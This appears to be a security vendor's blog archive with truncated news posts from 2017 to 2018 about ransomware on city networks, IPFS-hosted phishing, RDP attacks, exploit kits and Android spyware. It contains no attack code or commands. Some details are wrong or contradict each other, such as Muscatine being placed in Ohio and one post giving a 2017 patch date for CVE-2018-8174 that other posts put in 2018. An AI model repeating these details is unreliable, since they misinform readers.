This year has seen several ransomware attacks on cities and municipal targets, clearly demonstrating that the threat from ransomware has not abated, despite several analyses from cybersecurity firms that suggest hackers are moving away from ransomware and concentrating on cryptomining malware attacks. Cryptocurrency miners have certainly become more popular and their use has increased substantially in recent months, but there is still a significant threat from ransomware. Ransomware development may have slowed, but ransomware attacks on cities and other high value targets have not. In fact, October has seen two new ransomware attacks on cities in the United States, along with several attacks on municipal targets in the past few months. It is clear that the threat is not going away any time soon.
$2,000 Ransom Paid to Resolve City of West Haven Ransomware Attack
The City of West Haven ransomware attack started on the morning of October 16, 2018, and by the time the attack had been contained, 23 servers had been encrypted and taken out of action. Prompt action limited the scope of the attack, although it did cause major disruption as all computers on the affected network had to be shut down. The attack affected a critical system, and after an assessment of the situation, the decision was taken to pay the ransom. Considering the number of servers affected, the ransom demand was relatively low. The city paid $2,000 in Bitcoin for the keys to decrypt its files. Art House, Connecticut’s chief of cybersecurity, explained that this was one of several targeted ransomware attacks on cities and municipal services in the state in recent weeks. In February, around 160 computers were affected by ransomware in more than a dozen agencies in the state according to the Department of Administrative Services, and a month later the state’s Judicial Branch was attacked and had more than 100 servers encrypted.
City of Muscatine Ransomware Attack
The West Haven ransomware attack was shortly followed by a ransomware attack on the city of Muscatine in Ohio, which saw files on several government servers encrypted. The attack is understood to have started on October 17 and caused...
by G Hunt |
October 17, 2018 |
Cybersecurity News, Internet Security News
TitanHQ, the leading provider of web filtering, spam filtering, and email archiving solutions for managed service providers (MSPs), recently partnered with Datto Networking, the leading provider of IT solutions to SMBs delivered through MSPs. Datto Networking has now incorporated TitanHQ’s advanced web filtering technology into the Datto Networking Appliance to provide superior protection to users on the network. Datto and TitanHQ will be hosting a webinar on October 18, 2018 to explain how the new technology provides enhanced protection from web-based threats, and how MSPs can easily deliver content filtering to their customers. During the webinar, MSPs will find out about the enhanced functionality of the Datto Networking Appliance.
Webinar: Datto Networking & TitanHQ Deliver Enhanced Web Content Filtering
Date: Thursday, October 18th
Time: 11AM ET | 8AM PT | 4PM GMT/BST
Speakers: John Tippett, VP, Datto Networking; Andy Katz, Network Solutions Engineer; Rocco Donnino, EVP of Strategic Alliances, TitanHQ
by G Hunt |
October 8, 2018 |
Cybersecurity News, Internet Security News
The Cloudflare IPFS gateway has only recently been launched, but it is already being used by phishers to host malicious content. Cloudflare IPFS gateway phishing attacks are likely to have a high success rate, as some of the checks performed by end users to confirm the legitimacy of domains will not raise red flags.
IPFS is a P2P system that allows files to be shared easily throughout an organization and accessed through a web browser. Content is distributed to different nodes throughout the networked systems. The system can be used for creating distributed websites, and Cloudflare has made this process easier by offering free SSL certificates and allowing domains to be easily connected to IPFS. If phishers host their phishing forms on Cloudflare IPFS, they benefit from Cloudflare’s SSL certificate. Since the phishing page URL will start with cloudflare-ipfs.com, this adds legitimacy. The Cloudflare-owned domain is more likely to be trusted than domains owned by phishers.
When Cloudflare IPFS gateway phishing forms are encountered, visitors will be advised that the webpage is secure, the site starts with HTTPS, and a green padlock will be displayed. If the visitor takes the time to check the certificate information of the web page, they will find it has been issued to cloudflare-ipfs.com by Cloudflare Inc., and the certificate is valid. The browser will not display any warning and Cloudflare IPFS gateway phishing content will therefore seem legitimate.
At least one threat actor is using the Cloudflare IPFS gateway for phishing and is hosting forms that claim to be standard login pages for Office 365, DocuSign, Azure AD, and other cloud-based services, complete with appropriate logos. If a visitor fills in the form, their credentials will be forwarded to the operator of a known phishing domain – searchurl.bid – and the user will be shown a document about business models, strategy and innovation. This may also not raise a red flag.
The Cloudflare IPFS gateway phishing strategy is similar to that used on Azure Blob storage, which also takes advantage of legitimate SSL certificates. In that case the certificate is issued by Microsoft. It...
by G Hunt |
September 30, 2018 |
Cybersecurity Advice, Internet Security News
Windows Remote Desktop Protocol attacks are one of the most common ways cybercriminals gain access to business networks to install backdoors, gain access to sensitive data, and install ransomware and other forms of malware. This attack method has been increasing in popularity over the past two years and there has also been a notable rise in darknet marketplaces selling exposed RDP services and RDP login credentials. The high number of Remote Desktop Protocol attacks has prompted the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) and the Department of Homeland Security to issue an alert to businesses in the United States to raise awareness of the threat. Remote Desktop Protocol is a proprietary Windows network protocol that allows individuals to remotely access computers and servers over the Internet and gain full control of resources and data. RDP is often used for legitimate purposes, such as allowing managed security service providers (MSSPs) and managed service providers (MSPs) to remotely access devices to provide computer support without having to make a site visit. Through RDP, input such as mouse movements and keystrokes can be transmitted over the Internet with a graphical user interface sent back. In order to gain access to a machine using RDP, a user must be authenticated by supplying a username and password. Once a user is authenticated, the resources on that device can be accessed. While authorized individuals can use RDP connections, so too can cybercriminals if they have access to login credentials or are able to guess usernames and passwords. As with any software, RDP can contain flaws. For instance, flaws in the CredSSP encryption mechanism could be exploited to perform man-in-the-middle attacks. Cybercriminals are identifying vulnerable RDP sessions over the Internet and are exploiting them to gain access to sensitive information and conduct extortion attacks. 
The threat actors behind SamSam ransomware, which has been used in many attacks on U.S. businesses, educational institutions, and healthcare providers, often gain access to networks through brute force attempts to guess weak passwords. The threat actors...
by G Hunt |
September 20, 2018 |
Cybersecurity News, Internet Security News
Recent research has shown that the United States is the main distributor of exploit kits and hosts the most malicious domains, and that cyberattacks on websites have increased sharply.
United States Hosts the Most Malicious Domains and Exploit Kits
The United States hosts the most malicious domains and is the number one source for exploit kits, according to new research conducted by Palo Alto Networks. Further, the number of malicious domains increased between Q1 and Q2 in the United States. In all other countries, apart from the Netherlands, the number of malicious domains remained constant or declined. Exploit kit activity is only at a fraction of the level of 2016, although the web-based kits still pose a major threat to businesses with poor patching processes and a lack of protections against web-based attacks. Three exploit kits have been extensively used throughout Q1 and Q2, 2018: Sundown, Rig, and KaiXin. The United States is the number one source for the Sundown and Rig EKs and is number two behind China for the KaiXin exploit kit. Further, a new exploit kit was detected in Q2: Grandsoft. The United States is also the number one source for this new exploit kit.
More than twice the number of exploit kits are hosted in the United States than in Russia, which is in second place. 495 malicious URLs were detected in the United States compared to 147 in Russia. 296 malicious URLs hosting exploit kits were detected in the United States, with Russia in second place with 139. The Microsoft VBScript vulnerability, CVE-2018-8174, is being extensively exploited via these exploit kits. Microsoft released a patch in May 2018 to fix the flaw, but many companies have yet to install the update and are vulnerable to attack. Exploit kits are still using old vulnerabilities to install their malicious payloads.
According to Palo Alto Networks’ Unit 42, two vulnerabilities are extensively used – the IE7 vulnerability – CVE-2009-0075 – and the Internet Explorer 5 vulnerability – CVE-2008-4844 – even though patches were released to fix the flaws more than 9 years ago. The JScript vulnerability in Internet Explorer 9 through 11 – CVE-2016-0189 – and the OleAut32.dll...
by G Hunt |
August 15, 2018 |
Cybersecurity News, Internet Security News
There has been a marked rise in HTTPS phishing website detections, phishing attacks are increasing, and the threat of phishing attacks is greater than ever before. Phishing is the biggest cyber threat that businesses must now deal with. It is the easiest way for cybercriminals to gain access to email accounts for business email compromise scams, steal credentials, and install malware.
The Threat from Phishing is Getting Worse
The Anti-Phishing Working Group – an international coalition of government agencies, law enforcement, trade associations, and security companies – recently published its phishing trends activity report for Q1, 2018. The report shows that the threat from phishing is greater than ever, with more phishing websites detected in March 2018 than at any point in the past year. In the first half of 2017, there was an average of 48,516 phishing websites detected each month. The figure rose to 79,464 phishing websites detected on average per month in the second half of the year. In the first quarter of 2018, there was an average of 87,568 phishing websites detected, with detections peaking in March when more than 115,000 phishing sites were identified. The number of unique phishing reports received in Q1, 2018 (262,704) was 12.45% higher than in the final quarter of 2017.
Healthcare Industry Heavily Targeted
In the United States, the Health Insurance Portability and Accountability Act (HIPAA) requires healthcare providers, health insurers, healthcare clearinghouses and business associates of HIPAA-covered entities to report breaches of protected health information within 60 days of the discovery of the breach. The main enforcer of HIPAA compliance, the Department of Health and Human Services’ Office for Civil Rights (OCR), publishes summaries of those breach reports. Those summaries show just how serious the threat from phishing is. HIPAA-covered entities and business associates have reported 45 email hacking incidents in 2018 – 21.68% of all breaches reported.
Phishers Make the Move to HTTPS
PhishLabs, an anti-phishing vendor that provides a security awareness training and phishing simulation platform, has been tracking HTTPS...
by G Hunt |
July 30, 2018 |
Cybersecurity News, Internet Security News
Exploit kit activity may not be at the level it once was, but the threat has not gone away. Rig exploit kit activity has increased steadily in 2018 and now a new exploit kit has been detected. The exploit kit has been named Underminer by Trend Micro researchers, who detected it in July 2018. The Underminer exploit kit is being used to spread bootkits which deliver coinminer malware. The EK is primarily being used in attacks in Japan, although other East Asian countries have also seen attacks, with activity now spreading beyond this region.
The Underminer exploit kit was also detected by Malwarebytes researchers, who note that the exploitation framework was first identified by the Chinese cybersecurity firm Qihoo360 in late 2017, when it was being used to deliver adware. Now the exploit kit is being used to deliver Hidden Bee (Hidden Mellifera) cryptocurrency mining malware. Trend Micro notes that evidence has been uncovered that strongly suggests the exploit kit was developed by the developers of the Hidden Mellifera coinminer malware.
The exploit kit uses complex methods to deliver the payload, with different methods used for different exploits. The developers have also incorporated several controls to hide malicious activity, including the obfuscation of exploits and landing pages and the use of encryption to package exploits on-the-fly. The EK profiles the user via the user-agent to determine if the user is of interest. If not, the user will be directed to an HTTP 404 error page. If a user is of interest, a browser cookie will be used to identify that user to ensure that the payload will only be delivered once, preventing reinfection and hampering efforts by researchers to reproduce an attack. URLs used in the attacks are also randomized to prevent detection by standard AV solutions. The coinminer is delivered via a bootkit which is downloaded through encrypted TCP tunnels.
The Underminer exploit kit contains a limited number of exploits: the Adobe Flash Player exploit CVE-2018-4878, the use-after-free Adobe Flash Player vulnerability CVE-2015-5119, and the Internet Explorer memory corruption vulnerability CVE-2016-0189. Patches for all of the vulnerabilities were...
by G Hunt |
July 26, 2018 |
Internet Security News, Network Security
A recent analysis of exploit kit activity by Trend Micro has shown that while exploit kit activity is at a fraction of what it was in 2016, the threat has not gone away. Links to malicious websites hosting exploit kits are still being distributed by spam email, and malicious adverts are still being used to redirect web users to malicious websites hosting exploit kits. Most of the exploit kits that were in use in 2016 – Angler, Nuclear, and Neutrino – have all but disappeared. There was a rise in Sundown activity in 2017, but activity has now stopped, and the Disdain and Terror exploit kits have similarly disappeared. The demise of exploit kits as an attack vector has been attributed, in part, to the arrests of the operators of some of the most commonly used EKs such as Angler; there have also been fewer zero-day vulnerabilities to exploit. Many of the exploits used in exploit kits are for Flash vulnerabilities, and while use of Flash is declining, the creators of exploit kits are still attempting to exploit a handful of these Adobe Flash vulnerabilities. Many threat actors have switched to easier and less time-consuming ways of attacking businesses, but not all. While most exploit kits are operating at a low level, the Rig exploit kit is still in use and has recently been updated once again. Further, there has been a steady increase in Rig exploit kit activity since April. Rig is most commonly used in attacks in Japan, which accounts for 77% of Rig activity. The GrandSoft exploit kit is still active, although at a much lower level than Rig. This exploit kit was first seen in 2012, although activity all but disappeared until the fall of last year, when it became active once again. Japan is also the country most targeted by the GrandSoft exploit kit (55% of activity), while the private exploit kit Magnitude is almost exclusively used in South Korea, which accounts for 99.5% of its activity.
For the most part, exploit kits are being used to exploit vulnerabilities that should have been patched long ago, such as the use-after-free vulnerability in Microsoft Windows’ VBScript engine (CVE-2018-8174) which was identified in April 2017 and patched in May 2017. Internet...
by G Hunt |
May 31, 2018 |
Cybersecurity News, Internet Security News
The RIG exploit kit, used on compromised and malicious websites to silently download malware, has been upgraded with a new exploit. Windows Double Kill exploit code has been added to exploit the CVE-2018-8174 vulnerability – a remote code execution vulnerability that was addressed by Microsoft on May 2018 Patch Tuesday. To protect against exploitation of this vulnerability, Windows users should ensure they have applied the latest round of patches, although many businesses have been slow to update their Windows devices, leaving them vulnerable to attack. The vulnerability is in the VBScript engine and how it handles objects in memory. If the vulnerability is exploited, attackers would gain the same level of privileges as the current user, could reallocate memory, gain read/write access, and potentially remotely execute code on a vulnerable device. The vulnerability has been named ‘Double Kill’ and affects all Windows versions. The Windows Double Kill vulnerability was being actively exploited in the wild when Microsoft released the update on Patch Tuesday. Initially, exploitation of the vulnerability was achieved through phishing campaigns using RTF documents containing a malicious OLE object. If activated, an HTML page was downloaded and rendered through an Internet Explorer library, and the VBScript flaw was exploited to download a malicious payload. The attack could also be conducted via a malicious website. In the latter case, it does not matter which browser the user has set as default – on unpatched systems the IE exploit could still work. The Windows Double Kill exploit code was posted online this week, and it didn’t take long for it to be incorporated into the RIG exploit kit. End users could be directed to the RIG exploit kit through phishing campaigns, malvertising, or web redirects, or could potentially visit malicious sites through general web browsing.
In addition to the Windows Double Kill exploit, the RIG exploit kit contains many other exploits for a wide range of vulnerabilities. Any individual who lands on a URL with the kit installed could be vulnerable even if the latest Windows patch has already been applied. The threat from...
by G Hunt |
April 20, 2018 |
Cybersecurity News, Internet Security News
There have been significant developments relating to exploit kits in the past few days. The threat actors behind the Magnitude exploit kit have now changed their malicious payload, and the EITest malware distribution network that directed traffic to exploit kits has finally been sinkholed.
Magnitude Exploit Kit Switches to GandCrab Ransomware Delivery
Exploit kit activity is at a fraction of the level of 2015 and 2016, and in 2017 there was a 62% reduction in the development of exploit kits, according to research from Recorded Future. However, exploit kit activity has not fallen to zero, and the malicious code is still widely used to deliver malware and ransomware. This underscores the continued need for technologies that block these attacks, such as web filtering solutions, and the continued need to keep on top of patching. Exploit kits often leverage vulnerabilities in Java and Adobe Flash, although more recently it has been Microsoft vulnerabilities that have been exploited, due to the fall in Java vulnerabilities and the phasing out of Adobe Flash. One exploit kit that is still being used in extensive attacks, albeit attacks that are highly geographically targeted, is the Magnitude exploit kit. For the past seven months, the Magnitude exploit kit has been delivering the Magniber ransomware payload almost exclusively in South Korea. However, there has been a notable change in the past few days, with it also being used to distribute GandCrab ransomware; the latter is not restricted geographically and is capable of infecting English-language Windows devices. While early variants of GandCrab ransomware were cracked and free recovery of files was possible, there is no known decryptor for the current version of GandCrab ransomware being distributed via Magnitude. While Adobe Flash and Microsoft exploits were commonly used, Magnitude is now using a fileless technique to load the ransomware. This technique makes it much harder to detect.
According to Malwarebytes, “The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.” Once run, the payload is injected into explorer.exe, files are encrypted, and...
by G Hunt |
March 20, 2018 |
Cybersecurity News, Internet Security News
Web-based malware attacks via exploit kits were commonplace in 2016, although in 2017 this mode of attack fell out of favor with cybercriminals, who concentrated on spam email to deliver their malicious payloads. Exploit kit activity is now at a fraction of the level of 2016, although 2017 did see an increase in activity using the Rig and Terror exploit kits. Now, a recent discovery by Proofpoint could see exploit kit activity start to increase once again. A new traffic distribution system is being offered on darknet marketplaces that helps cybercriminals direct users to sites hosting exploit kits and conduct web-based malware attacks. Traffic distribution systems – also known as TDS – buy and sell web traffic and are used to direct web users from one website to another. When a user clicks on a link that is part of a TDS, they are directed to a website without their knowledge – a website that could host an exploit kit and trigger a malware download. The new TDS – known as BlackTDS – requires threat actors to direct traffic to the service, which then filters that traffic and directs individuals to exploit kits based on their profile data. The service maximizes the probability of the exploit kit being able to download malware onto the user's device. The service can also be used to determine which malware will be downloaded, based on the profile of the user. Threat actors that sign up to use the service can inexpensively select the exploit kits and malware they want installed, with all aspects of the malware distribution service handled by the developers of BlackTDS. The developers also claim their cloud-based TDS includes fresh HTTPS domains that have not been blacklisted and that it is difficult for their cloudTDS to be detected by security researchers and sandboxes. Using spam campaigns and malvertising, threat actors can direct traffic to BlackTDS with all aspects of drive-by downloads handled by the developers.
Campaigns being run using BlackTDS have been directing users to the RIG-v, Sundown, and Blackhole exploit kits which are used to download a wide range of keyloggers, ransomware, and other malware variants. The provision of this malicious service...
by G Hunt |
January 24, 2018 |
Cybersecurity News, Internet Security News
According to Kaspersky Lab, one of the most dangerous threats to mobile users is Skygofree malware – a recently discovered Android malware threat that has been described as the most powerful Android malware variant ever seen. Skygofree malware has only recently been detected, but it is the product of some serious development. Kaspersky Lab believes it has been in development for more than three years. The result is a particularly nasty threat that all users of Android devices should take care to avoid. Once it is installed on a device, it has access to a considerable amount of data. It also has some rather impressive capabilities, supporting 48 different commands. Among its arsenal is the ability to take control of the camera and snap pictures and take videos without the knowledge of the user. It has access to geolocation data, so it is capable of tracking your every move: where you go, as well as where you have been. Skygofree malware will steal call records, discovering who you have spoken to and when, and will read your text messages. The malware can also record conversations and background noise, both during telephone calls and when the user enters a specific location – based on geolocation data – that has been set by the attacker. Whenever you are in range of a WiFi network that is controlled by the attacker, the device will automatically connect, even if WiFi is turned off. It also has access to all information in the phone’s memory, can check your calendar to tell what you have planned, and can intercept WiFi traffic. You also cannot privately communicate using WhatsApp with Skygofree malware installed: it abuses the Android Accessibility Service and can view your messages. Skype conversations are similarly not secure. As if that was not enough, the malware also serves as a keylogger, recording all data entered on the device. With such an extensive range of functions, this powerful new malware variant is clearly not the work of an amateur.
It is believed to be the product of an Italian intercept and surveillance company called Negg, that is known to work with law enforcement agencies. Kaspersky Lab researcher Alexey Firsh said, “Given the...
by G Hunt |
November 30, 2017 |
Cybersecurity News, Internet Security News
Kaspersky Lab has named ransomware as one of the key threats of 2017, and one that continues to plague businesses the world over. Ransomware attacks in 2017 are down year on year, but ransomware attacks on businesses are up. Ransomware attacks in 2016 were bad, but this year there have been three major attacks that have gone global – WannaCry in May, NotPetya in June, and most recently, the Bad Rabbit attacks in October. Many of the ransomware attacks in 2017 have been far more sophisticated than in 2015 and 2016, and attackers are now using a wider variety of tactics to install the malicious code. At the start of 2016, ransomware was primarily being installed using exploit kits, before attackers switched to spam email as the main method of delivery. Spam email remains one of the most common ways for ransomware to be installed, although each of the above three attacks used exploits for unpatched vulnerabilities. Those exploits, all of which had been developed and used by the NSA, had been leaked online by the hacking group Shadow Brokers. While not as severe as WannaCry, NotPetya and Bad Rabbit, the AES-NI and Uiwix ransomware variants also used those exploits. Threat actors are also using remote desktop protocol to gain access to systems to install ransomware, while the use of exploit kits is once again on the rise. There has been a noticeable change in targets since 2015, when ransomware started to be favored by cybercriminals. Consumers were the main targets, although cybercriminals soon realized there was more to be made from attacking businesses. In 2016, 22.6% of ransomware attacks were on business users. The Kaspersky Lab report shows that ransomware attacks on businesses are becoming far more common, accounting for 26.2% of all attacks in 2017. Of the businesses that experienced a ransomware attack in 2017, 65% said they lost access to a significant amount of data, and in some cases, all of their data.
Some businesses have prepared for the worst and have developed ransomware response plans and now have multiple copies of backups, with at least one copy on an unnetworked device. In the event of an attack, data can be recovered. Others have not been so...
by G Hunt |
October 24, 2017 |
Cybersecurity News, Internet Security News
The Magnitude exploit kit is being used to deliver a new malware variant – Magniber ransomware. While the Magnitude EK has been used in attacks throughout the Asia Pacific region, the latest attacks are solely taking place in South Korea. Ransomware and malware attacks in Europe and the Americas are primarily conducted via spam email, as exploit kits have fallen out of favor with cybercriminals over the past year. However, that is not the case in the Asia Pacific region, where exploit kit attacks are still common. An exploit kit is a website toolkit that scans visitors’ browsers for exploitable vulnerabilities. When a vulnerability is identified, it is exploited to download malware onto the user’s system. The download occurs silently, and in the case of a ransomware attack, the user is only likely to discover the attack when their files have been encrypted. Magniber ransomware takes its name from the Magnitude EK and Cerber ransomware, the ransomware variant that it has replaced. At present, Magniber ransomware is solely targeting users in South Korea. If the operating system language is not Korean, the ransomware will not execute. While it is not unusual for ransomware campaigns to involve some targeting, it is rare for attacks to be targeted on a specific country. Up until recently, the Magnitude exploit kit was being used to download Cerber ransomware. FireEye reports that those attacks were concentrated in the Asia Pacific region: 53% of attacks occurred in South Korea, followed by the USA (12%), Hong Kong (10%), Taiwan (10%), Japan (9%), and Malaysia (5%). Small numbers of attacks also occurred in Singapore and the Philippines. At the end of September, Magnitude EK activity fell to zero, but on October 15, the payload was updated and attacks were solely conducted in South Korea. To avoid analysis, Magniber ransomware checks whether it is running in a virtual environment. A check is also performed to identify the system language.
If the system language is Korean, data is encrypted with AES-128 and encrypted files are given the .ihsdj extension. After encryption, the ransomware deletes itself. If the system language is not Korean, the ransomware exits. At...
by G Hunt |
October 12, 2017 |
Internet Security News, Web Filtering
A Social Community Partnership employee fired for viewing pornography at work took legal action against her employer for unfair dismissal. However, Ireland’s Workplace Relations Commission (WRC) has upheld the Partnership’s decision to fire the employee, confirming the sanction was appropriate. In May 2016, the employee was discovered to have viewed pornography on her work computer and was promptly fired for gross misconduct. While the employee denied viewing pornography at work, a review of access logs on her computer revealed pornographic websites had been accessed on seven occasions between September and November 2015. The material accessed included depictions of rape and the abduction of girls. While viewing pornography at work is unacceptable in any office, the nature of the material that was accessed made this an egregious violation of the Partnership’s acceptable Internet usage policy, especially considering the Social Community Partnership works to support children and families.
Lack of Individual Logins Makes it Difficult to Attribute Inappropriate Internet Access to Individual Employees
The case was not clear cut, as the computers in the reception area where she worked did not require secure logins for each employee. The employee also denied that she had viewed pornography and claimed two other workers used the same computers. She also said that other employees could have used the computers when she was not at her desk. To determine that the employee was the person responsible for violating the company’s acceptable Internet use policy, the Partnership had to compare Internet logs against the work schedule. Multiple employees were found to have been working on four of the seven occasions, but the employee was the only person scheduled to work in the reception area on three of the occasions when pornography was accessed. The employee suggested the sites could have been popups, although the claim was rejected by her employer.
To determine whether access was due to a malware infection, an external computer expert was called in to conduct a scan of the computer. The scan confirmed no malware was present that could have redirected the browser to...
by G Hunt |
October 11, 2017 |
Cybersecurity News, Internet Security News
A massive Pornhub malvertising campaign has been detected that potentially resulted in millions of malware infections in the United States, Canada, UK, Australia and beyond. Malvertising is the term given to malicious adverts that dupe website visitors into visiting websites where malware is downloaded, or sites that are used to phish for login credentials. These malverts often appear on legitimate websites, adding to their apparent legitimacy. The malicious sites that users are directed to can download any type of malware – keyloggers, ransomware, spyware or adware. The Pornhub malvertising campaign was used to spread click fraud malware. The hacking group behind the campaign – KovCoreG – used the Kovter Trojan. The malware has persistence and will survive a reboot. Pornhub is one of the most popular adult websites, attracting millions of visitors. The website uses a third-party ad network called Traffic Junky. The attackers managed to sneak their malicious adverts past the controls the ad network has in place against malvertising. The attackers detected the browser being used and redirected users to a website tailored to their browser. The Pornhub malvertising campaign worked on users of Chrome, Internet Explorer/Edge and Firefox. The webpages had been expertly crafted to exactly match the colors and fonts of Google, Firefox, and Microsoft, and included the relevant logos and branding. The malicious webpages indicated a critical security update was required to secure the user’s browser. Clicking to download the update, and running that update, would result in infection. The Pornhub malvertising campaign was detected by Proofpoint, which notified the ad network and Pornhub. Both acted quickly to remediate the threat, although not before many users had been infected with malware.
A Web Filtering Solution Can Block Malvertising Attacks
Implementing a web filtering solution in the workplace is not just about preventing your employees from wasting time on Facebook.
A web filter is an important part of any layered cybersecurity defense strategy. The latest Pornhub malvertising campaign is a good example of how controlling the websites your employees can access can...
by G Hunt |
September 30, 2017 |
Cybersecurity News, Internet Security News
The cost of cybercrime is 23% higher than last year, according to a new study conducted by the Ponemon Institute on behalf of Accenture. The average annual cost of cybercrime is now $11.7 million per organization, having increased from $9.5 million last year. The Ponemon Institute conducted the 2017 Cost of Cybercrime study on 2,182 security and IT professionals at 254 organizations. Respondents were asked about the number of security breaches they experienced in the past 12 months, the severity of those incidents, and the cost of mitigation. The average number of security breaches experienced by each organization was 130 per year, which is more than twice the number of incidents that were being experienced 5 years ago and 27.4% more than this time last year. The costs of cybercrime were split into four areas: disruption to business processes, data loss, loss of revenue, and damage to equipment. Respondents were asked to rate each based on their cost. While the losses from disruption to the business were not insignificant, they were the least costly. The biggest cost was information loss. The costliest security incidents to resolve were malware attacks, which cost an average of $2.4 million to resolve, although the attacks were considerably more expensive to resolve in the United States, where the average losses were $3.82 million per incident. In second place were web-based attacks, costing an average of $2 million globally and $3.4 million in the United States. However, in terms of the amount of disruption caused, insider incidents topped the list, taking an average of 50 days to mitigate. Ransomware attacks took an average of 23 days to resolve. The cost of cybercrime report indicates organizations in financial services have the highest annual costs, spending an average of $18.28 million per organization. In second place was the energy sector, with an average annual cost of $17.20 million.
Organizations in the United States had the biggest annual security breach resolution costs, spending an average of $21 million each per year. Bottom of the list was Australia with average annual costs of $5 million. Organizations in the United Kingdom were spending an...
by G Hunt |
August 31, 2017 |
Cybersecurity News, Internet Security News
Earlier this year, the NeutrinoPOS banking Trojan source code was leaked, leading to several new variants of malware being created, the latest being Jimmy Nukebot. In contrast to its predecessor, which was used to steal bank card information, the latest version has lost that functionality. However, Jimmy Nukebot can perform a wide range of malicious functions, serving as a downloader for a wide range of malicious payloads. The malware also acts as a backdoor which allows the actors behind the new malware to monitor activity on an infected device. Security researchers at Kaspersky Lab have analysed Jimmy Nukebot infections and have seen the malware download a wide range of modules, including Monero cryptocurrency mining malware, web-injects similar to those used in NeutrinoPOS, and various other modules that modify the functions of the malware. The malware can take screenshots of an infected device and exfiltrate data, and could download any malicious payload onto an infected device. Publication of the source code of malware results in an increase in its popularity. With the malware used in more attacks, the probability of it being detected is much higher. In order to evade detection, considerable modification to the malware is required. This could well be the reason why so many changes have been made to the latest iteration. The authors of Jimmy Nukebot took the original source code of the NeutrinoPOS banking Trojan and totally restructured the malware. The way the new malware has been constructed also makes static analysis much more complicated. The new features of the malware make it a formidable threat. Jimmy Nukebot is able to learn about the system on which it is installed and use that information for exploitation, tailoring the payload it delivers based on its environment rather than performing a pre-set malicious activity immediately upon infection.
Since the malware passively collects information and responds accordingly, it is unlikely to trigger AV alerts and may remain undetected. Organizations that have the malware installed are therefore unlikely to be aware that their systems have been compromised. Protecting against threats such as this requires...
by G Hunt |
August 31, 2017 |
Cybersecurity News, Internet Security News
Downloading apps from non-official sources potentially places users at risk, but Google Play Store malware-infected apps do exist. Google has controls in place to prevent malicious apps from being uploaded to its app store, but those controls are not always 100% effective. Choosing to download apps only from official stores is no guarantee that the apps will be free from malware. Security researchers recently discovered around 300 apps offered through the Google Play store that appear to be legitimate programs, yet are infected with malware that adds infected devices to a large botnet. The botnet was being used to launch distributed denial of service (DDoS) attacks on websites. The botnet, dubbed WireX, comprises tens of thousands of Android devices that are being used in highly damaging cyberattacks. Devices started to be infected in early July, with a steady rise in additions over the following weeks. Even though the number of compromised devices grew steadily in July, the botnet was only discovered in early August, when the WireX botnet started to be used in small-scale DDoS attacks. Since then, larger attacks have taken place, mostly targeting the hospitality sector. Those attacks have clogged websites with junk traffic, preventing legitimate users from accessing the sites. Some of the WireX DDoS attacks involved as many as 160,000 unique IPs. Since devices could conceivably attack websites from multiple addresses, the size of the botnet has been estimated to be around 70,000 devices. The growth of the botnet was soon attributed to malicious apps, with researchers discovering around 300 Google Play Store malware-infected apps. Google has now disabled those apps and is in the process of removing them from devices. The apps included video players, battery boosters, file managers and ringtones. The apps were not simply malware, as users would undoubtedly attempt to delete the apps if they failed to perform their advertised functions.
The apps all worked and users who downloaded the apps were unaware that their devices were being used for malicious purposes. The malware used a ‘headless browser’ which was able to perform the functions of a standard...
by G Hunt |
August 3, 2017 |
Cybersecurity News, Internet Security News
A new mobile malware threat has been discovered – Invisible Man malware – that is being installed via fake software updates. Invisible Man malware is a keylogger that has been designed to obtain banking credentials. While the malware is not new – it has been around for four years – it is frequently updated, with a new variant discovered that takes advantage of the accessibility services on Android devices. As the name suggests, Invisible Man malware runs silently on infected devices, unbeknownst to the user. The malware is an overlay that sits atop legitimate banking apps and intercepts inputs as they are entered on the device. It also allows the attackers behind the malware to intercept text messages, in particular those used for two-factor authentication and codes sent by banks to authorize transactions. Once installed on a device, it has administrator rights to all Android accessibility services, is installed as the default SMS app, and has rights to send and receive SMS messages, make calls, and access contacts on the phone. It can also take screenshots and prevents itself from being uninstalled, according to Kaspersky Lab. Invisible Man malware has been developed for attacks in Australia, France, Germany, Poland, Singapore, Turkey and the UK, acting as a keylogger for 63 banking apps. All data collected is immediately transferred to its C2 server. Kaspersky Lab reports that Invisible Man malware is primarily being installed on devices using fake software updates, specifically fake Flash Player updates on malicious websites delivered via a downloaded apk file.
Beware of Fake Software Updates
The latest attacks highlight an important point. If you receive a warning on screen telling you that your software is out of date, don’t click and download the update. In this case, the user will be asked to confirm installation, and will be required to grant this app administrator rights to accessibility services.
Fake software updates are one of the most common methods used to distribute malware, bloatware, adware, ransomware and other nasties. Given the frequency of software updates now being released to address recently found vulnerabilities, your software may...
by G Hunt |
July 31, 2017 |
Cybersecurity News, Internet Security News
A new study has shown that cybercriminals have generated ransomware profits in excess of $25 million over the past two years, clearly demonstrating why cryptoransomware attacks have soared. There is big money to be made in this form of cyber extortion. The bad news is that with so many organizations paying to recover their files, the ransomware attacks will continue and will likely increase. Ransomware attacks are profitable because users are still failing to back up their data. Google’s figures suggest that even though the threat of data deletion or encryption is high, only 37% of computer users back up their data. That means if ransomware encrypts files, the only option to recover data is to pay the ransom demand. Figures from the FBI estimated ransomware payments to have exceeded $1 billion in 2016; however, it is difficult to accurately calculate ransomware profits since the authors go to great lengths to hide their activities. Ransomware profits are difficult to track, and companies are reluctant to announce attacks and whether payment has been made. There are two notable exceptions. The South Korean hosting company Nayana was attacked and had 153 Linux servers and 3,400 customer websites encrypted; the firm paid 1.2 billion Won – approximately $1 million – for the keys to unlock the encryption. More recently, a Canadian company has reportedly paid a ransom of $425,000 to recover its files, although the identity of the firm is still unknown. Now, a study conducted by Google, with assistance from Chainalysis, the University of California at San Diego, and New York University’s Tandon School of Engineering, has shed some light on actual ransomware profits. The study involved an analysis of blockchains and Bitcoin wallets known to have been used to collect ransomware payments. The researchers also used reports from victims and monitored network traffic generated by victims of ransomware attacks to help track where payments were sent.
The study looked at the top 34 ransomware strains and determined more than $25 million has been collected in the past two years. 95% of payments were cashed out using the Bitcoin trading platform BTC-e. Google has...
by G Hunt |
July 26, 2017 |
Cybersecurity News, Internet Security News
